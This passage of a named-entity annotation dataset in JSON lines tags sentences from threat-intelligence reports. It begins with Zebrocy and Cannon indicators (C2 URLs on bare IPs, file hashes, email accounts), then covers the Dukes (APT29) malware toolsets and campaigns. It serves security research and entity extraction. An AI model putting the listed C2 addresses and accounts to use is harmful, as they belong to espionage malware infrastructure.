"http://188.241.58.170/live/owa/office.dotm .", "spans": [{"start": 0, "end": 42, "label": "Indicator"}]} {"text": "Zebrocy Hashes :", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "Zebrocy C2 URLs :", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 10, "label": "System"}]} {"text": "http://188.241.58.170/local/s3/filters.php https://200.122.181.25/catalog/products/books.php .", "spans": [{"start": 0, "end": 42, "label": "Indicator"}, {"start": 43, "end": 92, "label": "Indicator"}]} {"text": "Cannon Hashes :", "spans": [{"start": 0, "end": 6, "label": 
"Malware"}]} {"text": "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "Cannon email Accounts :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 12, "label": "System"}]} {"text": "sahro.bella7@post.cz trala.cosh2@post.cz bishtr.cam47@post.cz lobrek.chizh@post.cz cervot.woprov@post.cz .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 41, "end": 61, "label": "Indicator"}, {"start": 62, "end": 82, "label": "Indicator"}, {"start": 83, "end": 104, "label": "Indicator"}]} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "The Dukes primarily target Western governments and related organizations , such as government ministries and agencies , political think tanks , and governmental subcontractors .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "Their targets have also included the governments of members of the Commonwealth of Independent States ; Asian , African , and Middle Eastern governments ; organizations associated with Chechen extremism ; and Russian speakers engaged in the illicit trade of controlled substances and drugs .", "spans": [{"start": 67, "end": 101, "label": "Organization"}]} {"text": "The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 88, 
"end": 96, "label": "Malware"}, {"start": 99, "end": 109, "label": "Malware"}, {"start": 112, "end": 121, "label": "Malware"}, {"start": 124, "end": 132, "label": "Malware"}, {"start": 135, "end": 144, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 157, "end": 167, "label": "Malware"}, {"start": 170, "end": 179, "label": "Malware"}, {"start": 186, "end": 196, "label": "Malware"}]} {"text": "In recent years , the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations .", "spans": [{"start": 22, "end": 27, "label": "Organization"}]} {"text": "The earliest activity we have been able to definitively attribute to the Dukes are two PinchDuke campaigns from November 2008 .", "spans": [{"start": 73, "end": 78, "label": "Organization"}, {"start": 87, "end": 96, "label": "Malware"}]} {"text": "These campaigns use PinchDuke samples that were , according to their compilation timestamps , created on the 5th and 12th of November 2008 .", "spans": [{"start": 20, "end": 29, "label": "Malware"}]} {"text": "The campaign identifiers found in these two samples are respectively , \u201c alkavkaz.com20081105 \u201d and \u201c cihaderi.net20081112 \u201d .", "spans": []} {"text": "The first campaign identifier , found in the sample compiled on the 5th , references alkavkaz.com , a domain associated with a Turkish website proclaiming to be the \u201c Chechan [sic] Informational Center \u201d .", "spans": [{"start": 85, "end": 97, "label": "Indicator"}]} {"text": "The second campaign identifier , from the sample compiled on the 12th , references cihaderi.net , another Turkish website that claims to provide \u201c news from the jihad world \u201d and which dedicates a section of its site to Chechnya .", "spans": [{"start": 83, "end": 95, "label": "Indicator"}]} {"text": "Due to a lack of other PinchDuke samples from 
2008 or earlier , we are unable to estimate when the Duke operation originally began .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 99, "end": 103, "label": "Organization"}]} {"text": "Based on our technical analysis of the known PinchDuke samples from 2008 however , we believe PinchDuke to have been under development by the summer of 2008 .", "spans": [{"start": 45, "end": 54, "label": "Malware"}, {"start": 94, "end": 103, "label": "Malware"}]} {"text": "In fact , we believe that by the autumn of 2008 , the Dukes were already developing not one but at least two distinct malware toolsets .", "spans": []} {"text": "This assertion is based on the oldest currently known sample of another Duke related toolset , GeminiDuke , which was compiled on the 26th of January 2009 .", "spans": [{"start": 72, "end": 76, "label": "Organization"}, {"start": 95, "end": 105, "label": "Malware"}]} {"text": "This sample , like the early PinchDuke samples , appears to already be a \u201c fully-grown \u201d sample , which is why we believe GeminiDuke was under development by the autumn of 2008 .", "spans": [{"start": 29, "end": 38, "label": "Malware"}, {"start": 122, "end": 132, "label": "Malware"}]} {"text": "That the Dukes were already developing and operating at least two distinct malware toolsets by the second half of 2008 suggests to us that either the size of their cyberespionage operation was already large enough to warrant such an arsenal of tools , or that they expected their operation to grow significantly enough in the foreseeable future to warrant the development of such an arsenal .", "spans": [{"start": 9, "end": 14, "label": "Organization"}]} {"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \u201c MiniDuke \u201d to identify the first Duke related malware they found .", "spans": [{"start": 19, "end": 23, "label": "Organization"}, {"start": 80, "end": 94, "label": "Organization"}, 
{"start": 113, "end": 121, "label": "Malware"}, {"start": 146, "end": 150, "label": "Organization"}]} {"text": "As explained in their whitepaper , the researchers observed the surprisingly small MiniDuke backdoor being spread via the same exploit that was being used by a malware that they had already named ItaDuke ; the \u201c Duke \u201d part of this malware \u2019s name had in turn come about because it reminded the researchers of the notable Duqu threat .", "spans": [{"start": 83, "end": 100, "label": "Malware"}, {"start": 196, "end": 203, "label": "Malware"}, {"start": 212, "end": 216, "label": "Organization"}, {"start": 322, "end": 326, "label": "Malware"}]} {"text": "Despite the shared history of the name itself however , it is important to note that there is no reason to believe that the Duke toolsets themselves are in any way related to the ItaDuke malware , or to Duqu for that matter .", "spans": [{"start": 124, "end": 128, "label": "Organization"}, {"start": 179, "end": 186, "label": "Malware"}, {"start": 203, "end": 207, "label": "Malware"}]} {"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the new toolsets were also given \u201c Duke \u201d -derived names , and thus the threat actor operating the toolsets started to be commonly referred to as \u201c the Dukes \u201d .", "spans": [{"start": 119, "end": 127, "label": "Malware"}, {"start": 165, "end": 169, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}]} {"text": "The only other publicly used name for the threat actor that we are aware of is \u201c APT29 \u201d .", "spans": [{"start": 81, "end": 86, "label": "Organization"}]} {"text": "Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and 
Uganda .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 167, "end": 186, "label": "Organization"}]} {"text": "Campaign identifiers from 2009 also reveal that by that time , the Dukes were already actively interested in political matters related to the United States ( US ) and the North Atlantic Treaty Organization ( NATO ) , as they ran campaigns targeting ( among other organizations ) a US based foreign policy think tank , another set of campaigns related to a NATO exercise held in Europe , and a third set apparently targeting what was then known as the Georgian \u201c Information Centre on NATO \u201d .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 171, "end": 205, "label": "Organization"}, {"start": 208, "end": 212, "label": "Organization"}, {"start": 356, "end": 360, "label": "Organization"}, {"start": 484, "end": 488, "label": "Organization"}]} {"text": "Of these campaigns , two clusters in particular stand out .", "spans": []} {"text": "The first is a set of campaigns from the 16th and 17th of April , 2009 , that targeted a US based foreign policy think tank , as well as government institutions in Poland and the Czech Republic .", "spans": []} {"text": "These campaigns utilized specially-crafted malicious Microsoft Word documents and PDF files , which were sent as e-mail attachments to various personnel in an attempt to infiltrate the targeted organizations .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 63, "end": 67, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 113, "end": 119, "label": "System"}]} {"text": "We believe this cluster of campaigns had a joint goal of gathering intelligence on the sentiments of the targeted 5 countries with respect to the plans being discussed at the time for the US to locate their \u201c European Interceptor Site \u201d missile defense base in Poland , with a related 
radar station that was intended to be located in the Czech Republic .", "spans": []} {"text": "Regarding the timing of these campaigns , it is curious to note that they began only 11 days after President Barack Obama gave a speech on the 5th of April declaring his intention to proceed with the deployment of these missile defenses .", "spans": []} {"text": "The second notable cluster comprises of two campaigns that were possibly aimed at gathering information on Georgia S-LOC-NATO relations .", "spans": [{"start": 107, "end": 125, "label": "Organization"}]} {"text": "The first of these runs used the campaign identifier \u201c natoinfo_ge \u201d , an apparent reference to the www.natoinfo.ge website belonging to a Georgian political body that has since been renamed \u201c Information Centre on NATO and EU \u201d .", "spans": [{"start": 100, "end": 115, "label": "Indicator"}, {"start": 215, "end": 219, "label": "Organization"}]} {"text": "Although the campaign identifier itself doesn\u2019t contain a date , we believe the campaign to have originated around the 7th of June 2009 , which was when the PinchDuke sample in question was compiled .", "spans": [{"start": 157, "end": 166, "label": "Malware"}]} {"text": "This belief is based on the observation that in all of the other PinchDuke samples we have analyzed , the date of the campaign identifier has been within a day of the compilation date .", "spans": [{"start": 65, "end": 74, "label": "Malware"}]} {"text": "The second campaign identifier , which we suspect may be related , is \u201c mod_ge_2009_07_03 \u201d from a month later and apparently targeting the Ministry of Defense of Georgia .", "spans": [{"start": 140, "end": 159, "label": "Organization"}]} {"text": "The spring of 2010 saw continued PinchDuke campaigns against Turkey and Georgia , but also numerous campaigns against other members of the Commonwealth of Independent States such as Kazakhstan , Kyrgyzstan , Azerbaijan and Uzbekistan .", "spans": [{"start": 
33, "end": 42, "label": "Malware"}]} {"text": "Of these , the campaign with the identifier \u201c kaz_2010_07_30 \u201d , which possibly targeted Kazakhstan , is of note because it is the last PinchDuke campaign we have observed .", "spans": [{"start": 136, "end": 145, "label": "Malware"}]} {"text": "We believe that during the first half of 2010 , the Dukes slowly migrated from PinchDuke and started using a new infostealer malware toolset that we call CosmicDuke .", "spans": [{"start": 52, "end": 57, "label": "Organization"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 154, "end": 164, "label": "Malware"}]} {"text": "The first known sample of the CosmicDuke toolset was compiled on the 16th of January 2010 .", "spans": [{"start": 30, "end": 40, "label": "Malware"}]} {"text": "Back then , CosmicDuke still lacked most of the credential-stealing functionality found in later samples .", "spans": [{"start": 12, "end": 22, "label": "Malware"}]} {"text": "We believe that during the spring of 2010 , the credential and file stealing capabilities of PinchDuke were slowly ported to CosmicDuke , effectively making PinchDuke obsolete .", "spans": [{"start": 93, "end": 102, "label": "Malware"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 157, "end": 166, "label": "Malware"}]} {"text": "During this period of transition , CosmicDuke would often embed PinchDuke so that , upon execution , CosmicDuke would write to disk and execute PinchDuke .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 64, "end": 73, "label": "Malware"}, {"start": 101, "end": 111, "label": "Malware"}, {"start": 144, "end": 153, "label": "Malware"}]} {"text": "Both PinchDuke and CosmicDuke would then operate independently on the same compromised host , including performing separate information gathering , data Exfiltration and communication with a command and control ( C&C ) server - although both malware would often use the same C&C server .", "spans": [{"start": 5, 
"end": 14, "label": "Malware"}, {"start": 19, "end": 29, "label": "Malware"}, {"start": 191, "end": 210, "label": "System"}, {"start": 213, "end": 216, "label": "System"}, {"start": 275, "end": 278, "label": "System"}]} {"text": "We believe the purpose of this parallel use was to \u2018 fieldtest \u2019 the new CosmicDuke tool , while at the same time ensuring operational success with the tried-and-tested PinchDuke .", "spans": [{"start": 73, "end": 83, "label": "Malware"}, {"start": 169, "end": 178, "label": "Malware"}]} {"text": "During this period of CosmicDuke testing and development , the Duke authors also started experimenting with the use of privilege escalation vulnerabilities .", "spans": [{"start": 22, "end": 32, "label": "Malware"}, {"start": 63, "end": 67, "label": "Organization"}]} {"text": "Specifically , on the 19th of January 2010 security researcher Tavis Ormandy disclosed a local privilege escalation vulnerability ( CVE-2010-0232 ) affecting Microsoft Windows .", "spans": [{"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 168, "end": 175, "label": "System"}]} {"text": "As part of the disclosure , Ormandy also included the source code for a proof-of- concept exploit for the vulnerability .", "spans": []} {"text": "Just 7 days later , on the 26th of January , a component for CosmicDuke was compiled that exploited the vulnerability and allowed the tool to operate with higher privileges .", "spans": [{"start": 61, "end": 71, "label": "Malware"}]} {"text": "During 2011 , the Dukes appear to have significantly expanded both their arsenal of malware toolsets and their C&C infrastructure .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 111, "end": 114, "label": "System"}]} {"text": "While the Dukes employed both hacked websites and purposely rented servers for their C&C infrastructure , the group rarely registered their own domain names , preferring instead to 
connect to their self- operated servers via IP addresses .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 85, "end": 88, "label": "System"}]} {"text": "The beginning of 2011 however saw a significant break from that routine , when a large grouping of domain names was registered by the Dukes in two batches ; the first batch was registered on the 29th of January and the second on the 13th of February .", "spans": [{"start": 134, "end": 139, "label": "Organization"}]} {"text": "All the domains in both batches were initially registered with the same alias : \u201c John Kasai of Klagenfurt , Austria \u201d .", "spans": []} {"text": "These domains were used by the Dukes in campaigns involving many of their different malware toolsets all the way until 2014 .", "spans": [{"start": 31, "end": 36, "label": "Organization"}]} {"text": "Like the \u201c MiniDuke loader \u201d , these \u201c John Kasai \u201d domains also provide a common thread tying together much of the tools and infrastructure of the Dukes .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 148, "end": 153, "label": "Organization"}]} {"text": "By 2011 , the Dukes had already developed at least 3 distinct malware toolsets , including a plethora of supporting components such as loaders and persistence modules .", "spans": [{"start": 14, "end": 19, "label": "Organization"}]} {"text": "In fact , as a sign of their arsenal \u2019s breadth , they had already decided to retire one of these malware toolsets as obsolete after developing a replacement for it , seemingly from scratch .", "spans": []} {"text": "The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 100, "end": 108, "label": "Malware"}, {"start": 113, "end": 121, "label": "Malware"}]} {"text": "While all of the earlier toolsets \u2013 GeminiDuke , PinchDuke , and CosmicDuke 
\u2013 were designed around a core infostealer component , MiniDuke is centered on a simplistic backdoor component whose purpose is to enable the remote execution of commands on the compromised system .", "spans": [{"start": 36, "end": 46, "label": "Malware"}, {"start": 49, "end": 58, "label": "Malware"}, {"start": 65, "end": 75, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}]} {"text": "The first observed samples of the MiniDuke backdoor component are from May 2011 .", "spans": [{"start": 34, "end": 51, "label": "Malware"}]} {"text": "This backdoor component however is technically very closely related to GeminiDuke , to the extent that we believe them to share parts of their source code .", "spans": [{"start": 71, "end": 81, "label": "Malware"}]} {"text": "The origins of MiniDuke can thus be traced back to the origins of GeminiDuke , of which the earliest observed sample was compiled in January of 2009 .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}]} {"text": "Unlike the simplistic MiniDuke toolset , CozyDuke is a highly versatile , modular , malware \u201c platform \u201d whose functionality lies not in a single core component but in an array of modules that it may be instructed to download from its C&C server .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 235, "end": 238, "label": "System"}]} {"text": "These modules are used to selectively provide CozyDuke with just the functionality deemed necessary for the mission at hand .", "spans": [{"start": 46, "end": 54, "label": "Malware"}]} {"text": "CozyDuke \u2019s modular platform approach is a clear break from the designs of the previous Duke toolsets .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 88, "end": 92, "label": "Organization"}]} {"text": "The stylistic differences between CozyDuke and its older siblings are further exemplified by the way 
it was coded .", "spans": [{"start": 34, "end": 42, "label": "Malware"}]} {"text": "All of the 4 previously mentioned toolsets were written in a minimalistic style commonly seen with malware ; MiniDuke even goes as far as having many components written in Assembly language .", "spans": [{"start": 109, "end": 117, "label": "Malware"}]} {"text": "CozyDuke however represents the complete opposite .", "spans": [{"start": 0, "end": 8, "label": "Malware"}]} {"text": "Instead of being written in Assembly or C , it was written in C++ , which provides added layers of abstraction for the developer \u2019s perusal , at the cost of added complexity .", "spans": [{"start": 40, "end": 41, "label": "System"}, {"start": 62, "end": 65, "label": "System"}]} {"text": "Contrary to what might be expected from malware , early CozyDuke versions also lacked any attempt at obfuscating or hiding their true nature .", "spans": [{"start": 56, "end": 64, "label": "Malware"}]} {"text": "In fact , they were extremely open and verbose about their functionality - for example , early samples contained a plethora of logging messages in unencrypted form .", "spans": []} {"text": "In comparison , even the earliest known GeminiDuke samples encrypted any strings that might have given away the malware \u2019s true nature .", "spans": [{"start": 40, "end": 50, "label": "Malware"}]} {"text": "Finally , early CozyDuke versions also featured other elements that one would associate more with a traditional software development project than with malware .", "spans": [{"start": 16, "end": 24, "label": "Malware"}]} {"text": "For instance , the earliest known CozyDuke version utilized a feature of the Microsoft Visual C++ compiler known as run-time error checking .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 77, "end": 86, "label": "Organization"}, {"start": 87, "end": 93, "label": "System"}, {"start": 94, "end": 97, "label": "System"}]} {"text": "This feature added automatic error checking 
to critical parts of the program \u2019s execution at the cost , from a malware perspective , of providing additional hints that make the malware \u2019s functionality easier for reverse engineers to understand .", "spans": []} {"text": "Based on these and other similar stylistic differences observed between CozyDuke and its older siblings , we speculate that while the older Duke families appear to be the work of someone with a background in malware writing ( or at the least in hacking ) , CozyDuke \u2019s author or authors more likely came from a software development background .", "spans": [{"start": 72, "end": 80, "label": "Malware"}, {"start": 140, "end": 144, "label": "Organization"}, {"start": 257, "end": 265, "label": "Malware"}]} {"text": "We still know surprisingly few specifics about the Dukes group \u2019s activities during 2012 .", "spans": [{"start": 51, "end": 56, "label": "Organization"}]} {"text": "Based on samples of Duke malware from 2012 , the Dukes do appear to have continued actively using and developing all of their tools .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 49, "end": 54, "label": "Organization"}]} {"text": "Of these , CosmicDuke and MiniDuke appear to have been in more active use , while receiving only minor updates .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 26, "end": 34, "label": "Malware"}]} {"text": "GeminiDuke and CozyDuke on the other hand appear to have been less used in actual operations , but did undergo much more significant development .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 15, "end": 23, "label": "Malware"}]} {"text": "On the 12th of February 2013 , FireEye published a blogpost alerting readers to a combination of new Adobe Reader 0-day vulnerabilities , CVE-2013-0640 and CVE-2013-0641 , that were being actively exploited in the wild . 
8 days after FireEye \u2019s initial alert , Kaspersky spotted the same exploit being used to spread an entirely different malware family from the one mentioned in the original report .", "spans": [{"start": 31, "end": 38, "label": "Organization"}, {"start": 101, "end": 113, "label": "System"}, {"start": 114, "end": 119, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}]} {"text": "On 27th February , Kaspersky and CrySyS Lab published research on this previously unidentified malware family , dubbing it MiniDuke .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 33, "end": 43, "label": "Organization"}, {"start": 123, "end": 131, "label": "Malware"}]} {"text": "As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 69, "end": 77, "label": "Malware"}]} {"text": "Their malware had not stayed undetected for those 4 and a half years .", "spans": []} {"text": "In fact , in 2009 a PinchDuke sample had been included in the malware set used by the AV-Test security product testing organization to perform anti-virus product comparison reviews .", "spans": [{"start": 20, "end": 29, "label": "Malware"}, {"start": 86, "end": 93, "label": "Organization"}]} {"text": "Until 2013 however , earlier Duke toolsets had not been put in a proper context .", "spans": [{"start": 29, "end": 33, "label": "Organization"}]} {"text": "That finally started to change in 2013 .", "spans": []} {"text": "The MiniDuke samples that were spread using these exploits were compiled on the 20th of February , after the exploit was already publicly known .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]} {"text": "One might argue that since this 
took place after the exploits were publicly mentioned , the Dukes simply copied them .", "spans": [{"start": 92, "end": 97, "label": "Organization"}]} {"text": "We however do not believe so .", "spans": []} {"text": "As mentioned by Kaspersky , even though the exploits used for these MiniDuke campaigns were near-identical to those described by FireEye , there were nevertheless small differences .", "spans": [{"start": 16, "end": 25, "label": "Organization"}, {"start": 68, "end": 76, "label": "Malware"}, {"start": 129, "end": 136, "label": "Organization"}]} {"text": "Of these , the crucial one is the presence of PDB strings in the MiniDuke exploits .", "spans": [{"start": 46, "end": 49, "label": "System"}, {"start": 65, "end": 73, "label": "Malware"}]} {"text": "These strings , which are generated by the compiler when using specific compilation settings , means that the components of the exploits used with MiniDuke had to have been compiled independently from those described by FireEye .", "spans": [{"start": 147, "end": 155, "label": "Malware"}, {"start": 220, "end": 227, "label": "Organization"}]} {"text": "We do not know whether the Dukes compiled the components themselves or whether someone else compiled the components before handing them to the group .", "spans": [{"start": 27, "end": 32, "label": "Organization"}]} {"text": "This does however still rule out the possibility that the Dukes simply obtained copies of the exploit binaries described by FireEye and repurposed them .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 124, "end": 131, "label": "Organization"}]} {"text": "In our opinion , this insistence on using exploits that are already under heightened scrutiny suggests the existence of at least one of three circumstances .", "spans": []} {"text": "Firstly , the Dukes may have been confident enough in their own abilities ( and in the slowness of their opponents to react to new threats ) that they did not care if their targets may 
already be on the lookout for anyone exploiting these vulnerabilities .", "spans": [{"start": 14, "end": 19, "label": "Organization"}]} {"text": "Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 59, "end": 67, "label": "Malware"}]} {"text": "Or thirdly , the Dukes may have invested so much into these campaigns that by the time FireEye published their alert , the Dukes felt they could not afford to halt the campaigns .", "spans": [{"start": 17, "end": 22, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}]} {"text": "We believe all three circumstances to have coexisted at least to some extent .", "spans": []} {"text": "As will become evident in this report , this was not a one-off case but a recurring theme with the Dukes , in that they would rather continue with their operations as planned than retreat from operating under the spotlight .", "spans": [{"start": 99, "end": 104, "label": "Organization"}]} {"text": "As originally detailed in Kaspersky \u2019s whitepaper , the MiniDuke campaigns from February 2013 employed spear-phishing emails with malicious PDF file attachments .", "spans": [{"start": 26, "end": 35, "label": "Organization"}, {"start": 56, "end": 64, "label": "Malware"}, {"start": 118, "end": 124, "label": "System"}, {"start": 140, "end": 143, "label": "System"}]} {"text": "These PDFs would attempt to silently infect the recipient with MiniDuke , while distracting them by displaying a decoy document .", "spans": [{"start": 6, "end": 10, "label": "System"}, {"start": 63, "end": 71, "label": "Malware"}]} {"text": "The headings of these documents included \u201c Ukraine \u2019s NATO Membership Action Plan ( MAP ) Debates \u201d , \u201c The Informal Asia-Europe Meeting ( ASEM ) Seminar on Human Rights 
\u201d , and \u201c Ukraine \u2019s Search for a Regional Foreign Policy \u201d .", "spans": [{"start": 54, "end": 58, "label": "Organization"}]} {"text": "The targets of these campaigns , according to Kaspersky , were located variously in Belgium , Hungary , Luxembourg and Spain .", "spans": [{"start": 46, "end": 55, "label": "Organization"}]} {"text": "Kaspersky goes on to state that by obtaining log files from the MiniDuke command and control servers , they were able to identify high-profile victims from Ukraine , Belgium , Portugal , Romania , the Czech Republic , Ireland , the United States and Hungary .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 64, "end": 72, "label": "Malware"}, {"start": 73, "end": 92, "label": "System"}]} {"text": "After the February campaigns , MiniDuke activity appeared to quiet down , although it did not fully stop , for the rest of 2013 .", "spans": [{"start": 31, "end": 39, "label": "Malware"}]} {"text": "The Dukes group as a whole however showed no sign of slowing down .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "In fact , we saw yet another Duke malware toolset , OnionDuke , appear first in 2013 .", "spans": [{"start": 29, "end": 33, "label": "Organization"}, {"start": 52, "end": 61, "label": "Malware"}]} {"text": "Like CozyDuke , OnionDuke appears to have been designed with versatility in mind , and takes a similarly modular platform approach .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 16, "end": 25, "label": "Malware"}]} {"text": "The OnionDuke toolset includes various modules for purposes such as password stealing , information gathering , denial of service ( DoS ) attacks , and even posting spam to the Russian social media network , VKontakte .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 112, "end": 129, "label": "System"}, {"start": 132, "end": 135, "label": "System"}, {"start": 208, "end": 217, "label": "System"}]} 
{"text": "The OnionDuke toolset also includes a dropper , an information stealer variant and multiple distinct versions of the core component that is responsible for interacting with the various modules .", "spans": [{"start": 4, "end": 13, "label": "Malware"}]} {"text": "What makes OnionDuke especially curious is an infection vector it began using during the summer of 2013 .", "spans": [{"start": 11, "end": 20, "label": "Malware"}]} {"text": "To spread the toolset , the Dukes used a wrapper to combine OnionDuke with legitimate applications , created torrent files containing these trojanized applications , then uploaded them to websites hosting torrent files .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 60, "end": 69, "label": "Malware"}]} {"text": "Victims who used the torrent files to download the applications would end up getting infected with OnionDuke .", "spans": [{"start": 99, "end": 108, "label": "Malware"}]} {"text": "For most of the OnionDuke components we observed , the first versions that we are aware of were compiled during the summer of 2013 , suggesting that this was a period of active development around this toolset .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]} {"text": "Critically however , the first sample of the OnionDuke dropper , which we have observed being used only with components of this toolset , was compiled on the 17th of February 2013 .", "spans": [{"start": 45, "end": 54, "label": "Malware"}]} {"text": "This is significant because it suggests that OnionDuke was under development before any part of the Duke operation became public .", "spans": [{"start": 45, "end": 54, "label": "Malware"}, {"start": 100, "end": 104, "label": "Organization"}]} {"text": "OnionDuke \u2019s development therefore could not have been simply a response to the outing of one of the other Duke malware , but was instead intended for use alongside the other toolsets .", "spans": [{"start": 0, "end": 9, "label": 
"Malware"}, {"start": 107, "end": 111, "label": "Organization"}]} {"text": "This indication that the Dukes planned to use an arsenal of 5 malware toolsets in parallel suggests that they were operating with both significant resources and capacity .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]} {"text": "In 2013 , many of the decoy documents employed by the Dukes in their campaigns were related to Ukraine ; examples include a letter undersigned by the First Deputy Minister for Foreign Affairs of Ukraine , a letter from the embassy of the Netherlands in Ukraine to the Ukrainian Ministry of Foreign affairs and a document titled \u201c Ukraine \u2019s Search for a Regional Foreign Policy \u201d .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 176, "end": 191, "label": "Organization"}, {"start": 268, "end": 286, "label": "Organization"}, {"start": 290, "end": 305, "label": "Organization"}]} {"text": "These decoy documents however were written before the start of the November 2013 Euromaidan protests in Ukraine and the subsequent upheaval .", "spans": [{"start": 104, "end": 111, "label": "Organization"}]} {"text": "It is therefore important to note that , contrary to what might be assumed , we have actually observed a drop instead of an increase in Ukraine related campaigns from the Dukes following the country \u2019s political crisis .", "spans": [{"start": 171, "end": 176, "label": "Organization"}]} {"text": "This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": []} {"text": "This supports our analysis that the overarching theme in the Dukes \u2019 targeting is the collection of intelligence to support diplomatic efforts .", "spans": [{"start": 61, "end": 66, "label": "Organization"}]} {"text": "The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still 
weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 205, "end": 210, "label": "Organization"}]} {"text": "In a surprising turn of events , in September 2013 a CosmicDuke campaign was observed targeting Russian speakers involved in the trade of illegal and controlled substances .", "spans": [{"start": 53, "end": 63, "label": "Malware"}]} {"text": "Kaspersky Labs , who sometimes refer to CosmicDuke as \u2018 Bot Gen Studio \u2019 , speculated that \u201c one possibility is that \u2018 Bot Gen Studio \u2019 is a malware platform also available as a so-called \u2018 legal spyware \u2019 tool \u201d ;", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 40, "end": 50, "label": "Malware"}]} {"text": "therefore , those using CosmicDuke to target drug dealers and those targeting governments are two separate entities .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]} {"text": "We however feel it is unlikely that the CosmicDuke operators targeting drug dealers and those targeting governments could be two entirely independent entities .", "spans": [{"start": 40, "end": 50, "label": "Malware"}]} {"text": "A shared supplier of malware would explain the overlap in tools , but it would not explain the significant overlap we have also observed in operational techniques related to command and control infrastructure .", "spans": []} {"text": "Instead , we feel the targeting of drug dealers was a new task for a subset of the Dukes group , possibly due to the drug trade \u2019s relevance to security policy issues .", "spans": [{"start": 83, "end": 88, "label": "Organization"}]} {"text": "We also believe the tasking to have been temporary , because we have not observed any further similar targeting from the Dukes after the spring of 2014 .", "spans": [{"start": 121, "end": 126, "label": 
